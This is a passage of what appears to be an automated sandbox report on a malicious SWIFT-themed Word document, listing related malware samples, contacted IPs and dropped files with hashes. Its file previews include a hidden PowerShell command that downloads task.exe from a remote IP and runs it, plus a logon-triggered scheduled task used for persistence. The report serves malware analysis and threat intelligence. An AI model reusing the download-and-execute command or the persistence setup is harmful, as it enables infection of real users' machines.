                                                                                                                TransactionSummary_22-11-2021.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.198.143
                                                                                                                E invoice.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.198.143
                                                                                                                TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.223
                                                                                                                (KOREA SHIPPING - KLCSM).exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Bill of lading.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225

                                                                                                                ASN

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                PUBLIC-DOMAIN-REGISTRYUSMT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Reconfirm The Details.docGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Document.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Swift Copy TT.docGet hashmaliciousBrowse
                                                                                                                • 207.174.212.140
                                                                                                                MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                DOC221121.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.223
                                                                                                                Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                                • 103.50.163.110
                                                                                                                Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.198.143
                                                                                                                STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                                                • 199.79.62.99
                                                                                                                E invoice.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                TOwYernH3DhfPER.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.181
                                                                                                                Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                                • 103.50.163.110
                                                                                                                PUBLIC-DOMAIN-REGISTRYUSMT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Reconfirm The Details.docGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Document.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Swift Copy TT.docGet hashmaliciousBrowse
                                                                                                                • 207.174.212.140
                                                                                                                MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                DOC221121.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.223
                                                                                                                Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                                • 103.50.163.110
                                                                                                                Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.198.143
                                                                                                                STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                                                • 199.79.62.99
                                                                                                                E invoice.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.225
                                                                                                                TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.224
                                                                                                                TOwYernH3DhfPER.exeGet hashmaliciousBrowse
                                                                                                                • 208.91.199.181
                                                                                                                Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                                • 103.50.163.110
                                                                                                                EONIX-COMMUNICATIONS-ASBLOCK-62904USMT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                Reconfirm The Details.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                arm6-20211124-0649Get hashmaliciousBrowse
                                                                                                                • 170.130.75.226
                                                                                                                K7hNSg5hRL.exeGet hashmaliciousBrowse
                                                                                                                • 170.130.13.186
                                                                                                                MT 1O1.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                PO 635.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                DHL_119040 al#U0131#U015f irsaliyesi belgesi,pdf.exeGet hashmaliciousBrowse
                                                                                                                • 208.89.219.70
                                                                                                                PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                                                                                • 173.232.62.19
                                                                                                                1687HM2021.xlsx.exeGet hashmaliciousBrowse
                                                                                                                • 173.213.66.89
                                                                                                                BwJriVGrt5.exeGet hashmaliciousBrowse
                                                                                                                • 170.130.10.102
                                                                                                                PURCHASE ORDER.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                001100202021.exeGet hashmaliciousBrowse
                                                                                                                • 23.90.37.72
                                                                                                                bnmf4567.exeGet hashmaliciousBrowse
                                                                                                                • 50.3.41.145
                                                                                                                Hack.exeGet hashmaliciousBrowse
                                                                                                                • 104.140.244.186
                                                                                                                setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                • 107.158.11.57
                                                                                                                ixijzt2mxt.exeGet hashmaliciousBrowse
                                                                                                                • 104.140.201.42
                                                                                                                GTA5TerrorMM.exeGet hashmaliciousBrowse
                                                                                                                • 104.140.244.186
                                                                                                                FANDER_MOD V3.03.exeGet hashmaliciousBrowse
                                                                                                                • 104.140.201.42
                                                                                                                Injector.exeGet hashmaliciousBrowse
                                                                                                                • 104.140.201.42

                                                                                                                JA3 Fingerprints

                                                                                                                No context

                                                                                                                Dropped Files

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                C:\Users\user\AppData\Roaming\SzfukVRF.exeMT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exeMT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                                                                    C:\Users\user\AppData\Roaming\task.exeMT_1O1_SWIFt.docGet hashmaliciousBrowse

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):504832
                                                                                                                      Entropy (8bit):7.875034070984988
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:+v5E70ZixBFm0hDKr62YWLJp7WtXpcCAVS4EzOnsQ7b51:+vG70Zi1hy6O+LAVS4C
                                                                                                                      MD5:F65B0793251364C03D06E8E7134FC21B
                                                                                                                      SHA1:7BC80E89BBC7C10B974462E748849F9056D20D4A
                                                                                                                      SHA-256:A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
                                                                                                                      SHA-512:BAC2E15EAFEFF6708D67A224B96FBC62F062A6029D7E5DFCB773C2B07AAC4C01F910724192A6294DA3456B50E016F5A9859E9DD6EA18C2C51F02377AFBA3CB82
                                                                                                                      Malicious:true
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: MT_1O1_SWIFt.doc, Detection: malicious, Browse
                                                                                                                      Reputation:low
                                                                                                                      IE Cache URL:http://173.232.204.89/task.exe
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.a..............0.................. ........@.. ....................... ............@.................................|...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...t..........\... .............................................{ ...*..{!...*..{"...*..{#...*..($.....} .....}!.....}"......}#...*....0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o*...,.(+....{#....{#...o,...+..+..*..0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X*...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2CAE3F9.wmf
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3712
                                                                                                                      Entropy (8bit):5.037816902563746
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:Qk7Hgwj+mbYf3LSrhlOs0f5aSdHn63Dx3:Qk7Awam8fI4s0f5ap3
                                                                                                                      MD5:7E855AA0ECA27E6E8E2A2F8AE2A48F33
                                                                                                                      SHA1:C309D1A169059EA57D6AA0A4D5FA4B00B83C67C7
                                                                                                                      SHA-256:8E612AA9E10E31E5D64AB9FEC4E7FFBED91C8C47620CEED5C5460750EB5E4C3B
                                                                                                                      SHA-512:AFEBD07201DDEE57140E6444D62DA8BCC53D0F0F2C62951162E762136979A114DAD92B7652D6A3C9214A20265D04B3FE5BFA70870ED1AFD96BD5F8A837FEF27C
                                                                                                                      Malicious:false
                                                                                                                      Preview: ......@.....!.....................5...........................Segoe UI....C.-.....@..........#....-...........................A..... . ..... . ...:.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...:.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD7EADD8.png
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:370 sysV pure executable
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):262160
                                                                                                                      Entropy (8bit):0.24537807839389073
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:xcrH7XNEN+N8//zb+H2fffFilJBzkNDDN+N8//zb+H2fffFuExB+3NhDN+N8/mLk:2zrNVE9GJ6NuE9u/cwz1J6NuE9
                                                                                                                      MD5:ABBD59B3E4B072E6702F1F910CAA05D6
                                                                                                                      SHA1:9D8AD507D0339D217561F0A8E69607D38545D6BB
                                                                                                                      SHA-256:4C0541BD1C3B054F9FB790A3E7FC898908B2D9104FF61A09500A9CA1C3291870
                                                                                                                      SHA-512:7B17AACAEF606D51E448E37065D1EEF1C261239E7AE4A5F9B2A5FB0289A6C8B101B3A5C37055699FDA4536D45AD321989302E864F864EFB9E9DBE1B33E4B3F39
                                                                                                                      Malicious:false
                                                                                                                      Preview: X.:.....p.j.....o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e.". .-.N.o.P. .-.s.t.a. .-.N.o.n.I. .-.W. .H.i.d.d.e.n. .-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .b.y.p.a.s.s. .-.N.o.L.o.g.o. .-.c.o.m.m.a.n.d. .".(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.'.h.t.t.P.:././.1.7.3...2.3.2...2.0.4...8.9./.t.a.s.k...e.x.e.'.,.'.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.).;.S.t.a.r.t.-.P.r.o.c.e.s.s. .'.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.".............l.....0.k.......................................X.....................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):214016
                                                                                                                      Entropy (8bit):4.757014234408119
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:tBabzacasapa2H/Na7rRlBabzacasapa2H/Na7pmV:mbzacasapa2HY7Abzacasapa2HY7
                                                                                                                      MD5:B33010290F6ED0C12253AFD2B83EE458
                                                                                                                      SHA1:E492CAD440EFC9C93553D95A158ED84A0656F2AB
                                                                                                                      SHA-256:54147F6E9949D14672892FDC5104A02A1E41DB662D39EDC135FC12FB24C91C10
                                                                                                                      SHA-512:9C1FB272563766455908B1B41E84B4A386DDE1AF25B867103B3E4D52CA15CA1EA4B7008DB069313431CC35C40F1383BFACB0E10F21F00544822527C47D4E6135
                                                                                                                      Malicious:false
                                                                                                                      Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4D8A2392-564C-4DB2-903D-17A8A736109B}.tmp
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):44098
                                                                                                                      Entropy (8bit):2.879594246936239
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:dq/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:aFia0Dqeb0nstw29rVzWSgm58F
                                                                                                                      MD5:7C0A9B9DA73BA081A06703CECE345DFF
                                                                                                                      SHA1:84823768F9E22131B15777CB4196A15FEEF9ADCA
                                                                                                                      SHA-256:27748FD8FFDB4A4163016E5DA937315BD05E77357931B45BD1E1EC58C0C20A48
                                                                                                                      SHA-512:79969B8A67392228AE3998F1C6AF17F393EFD89CAF90D5D47426498E93EEED996DEB3AE150BCB82225058E8DD2F5F80D6FB9FC98198E0DF0E869AA6B2DA507F7
                                                                                                                      Malicious:false
                                                                                                                      Preview: c.0.5.=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.e.g.h.D.p.~...S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K.........................................................................................................................................................................................................................................................H...R...X............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.RJe...CJ..OJ..QJ..U..^J..aJ.
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{527B5D4D-3E6F-42BD-8FFA-6C52D5EDBEDF}.tmp
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1024
                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                      Malicious:false
                                                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{88FEB9FD-DBED-46CA-AEE6-1702A6B1006D}.tmp
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1536
                                                                                                                      Entropy (8bit):1.3573187972516119
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbl:IiiiiiiiiifdLloZQc8++lsJe1Mzq
                                                                                                                      MD5:B05EDE552A5E4F0375E4000DDD8804EB
                                                                                                                      SHA1:AFAA26BF1745F8425FB3B92CDF455B64C1030455
                                                                                                                      SHA-256:458E1D3CDD8D4D59A90D24A07CBFAEFEE7A13A0D793E0F173F080F79AE178BE7
                                                                                                                      SHA-512:46FE16339641E02940C4F8B1DBF3EE89B6CB2C5B6236AB5BB74B4F5DD3AE9979CB6820AA7A0DDB83952FA31CA5D08EB1FD2C3351C7DACC9F358D210B168BD1B6
                                                                                                                      Malicious:false
                                                                                                                      Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):97514
                                                                                                                      Entropy (8bit):4.489544623132179
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:VBabzacasapa2lGWOlARldNVYwUn7ZwPW1ir:VBabzacasapa2H/Na7M
                                                                                                                      MD5:EB599CC95ACB0DA0DAFFE2C49E6CA94C
                                                                                                                      SHA1:581089674A9F472221C002E613C5B1830ACC9D1D
                                                                                                                      SHA-256:936F1E2D5FB8C9CD1535E4092D28A989929BAFD0EFDF2A555D2AC5CF5612BFF7
                                                                                                                      SHA-512:7A378AA05AABFF3FCB305956BA7600875376B33477D654984AE1D9AC49D27BB0AFEDB5BE38C17DDAC754DDEE95CCD57F23336BBE3FD4ABC53477291E71971E27
                                                                                                                      Malicious:true
                                                                                                                      Preview: .............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26
                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:gAWY3n:qY3n
                                                                                                                      MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                                      SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                                      SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                                      SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                                      Malicious:false
                                                                                                                      Preview: [ZoneTransfer]..ZoneId=3..
                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
                                                                                                                      Process:C:\Users\user\AppData\Roaming\task.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1574
                                                                                                                      Entropy (8bit):5.11268735911116
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTDv
                                                                                                                      MD5:2FB2F595006AB549A4C00CC852A1F691
                                                                                                                      SHA1:9B8CFA7A4D43ADF4C3ADEA923AE5AFDDE3A40314
                                                                                                                      SHA-256:5466C2D681BB5F3A6B50D13FD153C920D963FE658574BBD123371BC02FAC0E86
                                                                                                                      SHA-512:76720B62C1F421B2D88E38540560033CE47D60D37AA5E22AEC2805A1CD78E3CE0EB716CF9770D00DC128043D6514EA9329B0C88FB9D6FDCF135151658D00BC11
                                                                                                                      Malicious:true
                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PAGO DEL SALDO.LNK
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Nov 26 01:21:13 2021, length=393199, window=hide
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1034
                                                                                                                      Entropy (8bit):4.557967550864718
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:8MyTSp1tgXg/XAlCPCHaXjByB/AVtX+W3MTxEUR9LicvbS2wIyR9BDtZ3YilMMEz:8My2/XTTc+bd/e52Dv3qg87l
                                                                                                                      MD5:9A01376D1343F9F324D36215EA07B616
                                                                                                                      SHA1:6AA3137B198FAE3A9868E48F28B4D4816A5ED0DF
                                                                                                                      SHA-256:D2CF4B190147E17EFEDF7545BAE918424531159EFC0E083FF28B15BC0034B6A9
                                                                                                                      SHA-512:7FCD858C9DB695DCA4E1D7E5F4AE9CEC2CA0629EBC637E2B154ECFEAB9EB1B9302D333DF5F2C7ACD40FBE2EA26548277FBA414D328EB99F3A24CA43DBEED588C
                                                                                                                      Malicious:false
                                                                                                                      Preview: L..................F.... ....f>....f>......Hl................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....zS.. .PAGODE~1.DOC..R.......S...S..*.........................P.A.G.O. .D.E.L. .S.A.L.D.O...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\PAGO DEL SALDO.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.A.G.O. .D.E.L. .S.A.L.D.O...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9..g............[D_
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):79
                                                                                                                      Entropy (8bit):4.741754287211816
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:bDuMJlt+A+rXCmX1uih+rXCv:bCm+drX0i8rXs
                                                                                                                      MD5:D5282C6D9AB64FE90D11B66486B8CE47
                                                                                                                      SHA1:8CECDE758E0C31861FB1ADE725D2FB28F9900385
                                                                                                                      SHA-256:FFA65D7871728B70C7EB183FB39BBEDE6EEFA7502FFEBA838276596DA8D429D3
                                                                                                                      SHA-512:082476690242A0145A0B81FD3EFF16126ABB09F0B02FDFFBAADB29670497E7D3C82232810FD5DD657CE6943738E7ADA77CFE3D909BA26C2D9AEBD6DB63468994
                                                                                                                      Malicious:false
                                                                                                                      Preview: [folders]..Templates.LNK=0..PAGO DEL SALDO.LNK=0..[doc]..PAGO DEL SALDO.LNK=0..
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):162
                                                                                                                      Entropy (8bit):2.5038355507075254
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                                      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                                      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                                      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                                      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                                      Malicious:false
                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2
                                                                                                                      Entropy (8bit):1.0
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Qn:Qn
                                                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                      Malicious:false
                                                                                                                      Preview: ..
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0VT7C41M2L4V6JEPSUND.temp
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8016
                                                                                                                      Entropy (8bit):3.576040061620306
                                                                                                                      Encrypted:false
